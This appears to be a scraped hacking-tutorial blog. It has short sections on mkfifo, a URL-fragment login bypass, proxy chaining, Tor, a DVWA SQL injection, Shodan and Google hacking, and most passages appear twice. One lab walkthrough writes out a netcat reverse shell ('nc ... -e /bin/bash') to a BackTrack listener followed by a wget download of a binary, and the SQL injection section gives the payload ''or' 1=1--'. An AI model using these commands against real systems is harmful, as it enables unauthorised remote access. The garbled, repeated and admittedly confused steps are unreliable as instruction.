INFORMATION GATHERING
https://docs.google.com/leaf?id=0B-KNbh5PxtuaMDI2ODQ4M2EtMmRhZC00MWEzLTgyYWItYTM2MzdlZTc5ODE5&hl=en_US
MKFIFO
The function Mkfifo can be used to create a named pipe from within a program. The signature of the function is as follows:
int mkfifo(const char *path, mode_t mode)
The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREATE|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.
int mkfifo(const char *path, mode_t mode)
The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREATE|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process' effective user ID, and its group ID is set to the process' effective group ID, or if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.
ByPass FBIP
First written localhost/fbip in browser
In the url says that after we are redirected to login
http://localhost/fbip/Process/proses_login.php
And now we enter # before proses_login.php.
http://localhost/fbip/Process/ #proses_login.php
http://localhost/fbip/Process/proses_login.php
And now we enter # before proses_login.php.
http://localhost/fbip/Process/ #proses_login.php
"Good Luck"
ABOUT PROXY CHAIN
Proxy chaining is merely connecting to more than one proxy and then to your intended destination. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be.
By using proxy chaining you will work by this way:
your computer => proxy1 => proxy2 => ... => proxy X => web-site
When you use proxy chaining software, in fact you create one "virtual proxy". And when you want to use chain proxy1 => proxy2 => ... => proxy X you need to use address of created "virtual proxy". This address you will know when you set up your chain of proxies.
Resume: proxy chain is way of using several (2,3, 10, etc.) proxy servers similar as one proxy server.
Remember: it doesn't matter how many proxies you chain together, you will never be 100% anonymous.
By using proxy chaining you will work by this way:
your computer => proxy1 => proxy2 => ... => proxy X => web-site
When you use proxy chaining software, in fact you create one "virtual proxy". And when you want to use chain proxy1 => proxy2 => ... => proxy X you need to use address of created "virtual proxy". This address you will know when you set up your chain of proxies.
Resume: proxy chain is way of using several (2,3, 10, etc.) proxy servers similar as one proxy server.
Remember: it doesn't matter how many proxies you chain together, you will never be 100% anonymous.
"ABOUT TOR"
What is TOR...?
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.
Individuals use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.
Why we need Tor
Using Tor protects you against a common form of Internet surveillance known as "traffic analysis." Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you're travelling abroad and you connect to your employer's computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.
How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that's an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you're doing and, possibly, what you're saying. That's because it focuses on the header, which discloses source, destination, size, timing, and so on.
A basic problem for the privacy minded is that the recipient of your communications can see that you sent it by looking at headers. So can authorized intermediaries like Internet service providers, and sometimes unauthorized intermediaries as well. A very simple form of traffic analysis might involve sitting somewhere between sender and recipient on the network, looking at headers.
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.
Individuals use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site. Individuals also use Tor for socially sensitive communication: chat rooms and web forums for rape and abuse survivors, or people with illnesses.
Why we need Tor
Using Tor protects you against a common form of Internet surveillance known as "traffic analysis." Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you're travelling abroad and you connect to your employer's computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.
How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that's an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you're doing and, possibly, what you're saying. That's because it focuses on the header, which discloses source, destination, size, timing, and so on.
A basic problem for the privacy minded is that the recipient of your communications can see that you sent it by looking at headers. So can authorized intermediaries like Internet service providers, and sometimes unauthorized intermediaries as well. A very simple form of traffic analysis might involve sitting somewhere between sender and recipient on the network, looking at headers.
EXPLOIT DVWA WITH SQL INJECTION
Start apache and start Sql
Open DPWA
loggin user name
password and setting DPWA to low
Select sql injection
And type 'or' 1= 1--
And next i'm confused
Open DPWA
loggin user name
password and setting DPWA to low
Select sql injection
And type 'or' 1= 1--
And next i'm confused
Chimothoa To Ubuntu Part 11
Ok Guys
First open Ubuntu and open terminal type command nc 192.168.43.1 098 -e /bin/bash
Next type command to batrack nc -l -v -p 098
root@bt:~# nc -l -v -p 098
listening on [any] 98 ...
192.168.43.129: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.43.1] from (UNKNOWN) [192.168.43.129] 54044
#ls
#type ls to ubuntu
And type command #wget 192.168.43.1/nc
,next #wget 192.168.43.101, #ls, #chmod, #ls -lia nc
And type command at batrack #nc 192.168.43.101 098, and #ls
First open Ubuntu and open terminal type command nc 192.168.43.1 098 -e /bin/bash
root@bt:~# nc -l -v -p 098
listening on [any] 98 ...
192.168.43.129: inverse host lookup failed: Unknown server error : Connection timed out
connect to [192.168.43.1] from (UNKNOWN) [192.168.43.129] 54044
#ls
#type ls to ubuntu
And type command #wget 192.168.43.1/nc
,next #wget 192.168.43.101, #ls, #chmod, #ls -lia nc
And type command at batrack #nc 192.168.43.101 098, and #ls
" ABOUT SHODAN"
SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Web search engines, such as Google and Bing, are great for finding websites. But what if you're interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don't let you answer those questions.
So what does SHODAN index then? Good question. The bulk of the data is taken from 'banners', which are meta-data the server sends back to the client. This can be information about the server software, what options the service supports, a welcome message or anything else that the client would like to know before interacting with the server. For example, following is a FTP banner:
220 kcg.cz FTP server (Version 6.00LS) ready.
This tells us a potential name of the server (kcg.cz), the type of FTP server (Solaris ftpd) and its version (6.00LS). For HTTP a banner looks like:
HTTP/1.0 200 OK
Date: Tue, 16 Feb 2010 10:03:04 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
Last-Modified: Wed, 01 Jul 1998 08:51:04 GMT
ETag: "135074-61-3599f878"
Accept-Ranges: bytes
Content-Length: 97
Content-Type: text/html
To get things started, search for computers that contain 'Apache' in their banner: Apache
Now that you know the basics of searching on SHODAN, it's time to move on and check out the various filters you can use to narrow down your search results.
Web search engines, such as Google and Bing, are great for finding websites. But what if you're interested in finding computers running a certain piece of software (such as Apache)? Or if you want to know which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are? Maybe a new vulnerability came out and you want to see how many hosts it could infect? Traditional web search engines don't let you answer those questions.
So what does SHODAN index then? Good question. The bulk of the data is taken from 'banners', which are meta-data the server sends back to the client. This can be information about the server software, what options the service supports, a welcome message or anything else that the client would like to know before interacting with the server. For example, following is a FTP banner:
220 kcg.cz FTP server (Version 6.00LS) ready.
This tells us a potential name of the server (kcg.cz), the type of FTP server (Solaris ftpd) and its version (6.00LS). For HTTP a banner looks like:
HTTP/1.0 200 OK
Date: Tue, 16 Feb 2010 10:03:04 GMT
Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.1.2 mod_gzip/1.3.19.1a mod_ssl/2.8.9 OpenSSL/0.9.6g
Last-Modified: Wed, 01 Jul 1998 08:51:04 GMT
ETag: "135074-61-3599f878"
Accept-Ranges: bytes
Content-Length: 97
Content-Type: text/html
The Basics
Now that you know what a banner is, you can start searching for computers that match your interests. First, lets take a look at the user interface:
- Search input box: where all the magic happens
- Country map: click on a country to only see computers from there in the results
- Service filter: decide which services should be searched
- Options bar: click on it to see the above filters
To get things started, search for computers that contain 'Apache' in their banner: Apache
- Search input: the query we used for searching, in this case 'apache'.
- Save: store useful search queries.
- Export: export up to 1,000 results in XML format.
- Result info: shows how many total hosts were found for the query.
- Country breakdown: highlights the countries that had the most matches for your query.
- Left side of results: contains the IP, operating system, date when it was added and the country the computer is in. If there's domain information available then that is shown as well.
- Right side of results: shows the banner with the search term(s) highlighted.
Now that you know the basics of searching on SHODAN, it's time to move on and check out the various filters you can use to narrow down your search results.
"GOOGLE HACKING"
Google hacking
What is Google hacking?
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.
What a hacker can do if your site is vulnerable
Information that the Google Hacking Database identifies:
How to check for Google hacking vulnerabilities
The easiest way to check whether your web site & applications have Google hacking vulnerabilities, is to use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your entire website and automatically checks for pages that are identified by Google hacking queries. (Note: Your web vulnerability scanner must be able to launch Google hacking queries).
What is Google hacking?
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling your site and launching the Google Hacking Database queries directly onto the crawled content.
What a hacker can do if your site is vulnerable
Information that the Google Hacking Database identifies:
- Advisories and server vulnerabilities
- Error messages that contain too much information
- Files containing passwords
- Sensitive directories
- Pages containing logon portals
- Pages containing network or vulnerability data such as firewall logs.
How to check for Google hacking vulnerabilities
The easiest way to check whether your web site & applications have Google hacking vulnerabilities, is to use a Web Vulnerability Scanner. A Web Vulnerability Scanner scans your entire website and automatically checks for pages that are identified by Google hacking queries. (Note: Your web vulnerability scanner must be able to launch Google hacking queries).
Subscribe to:
Posts (Atom)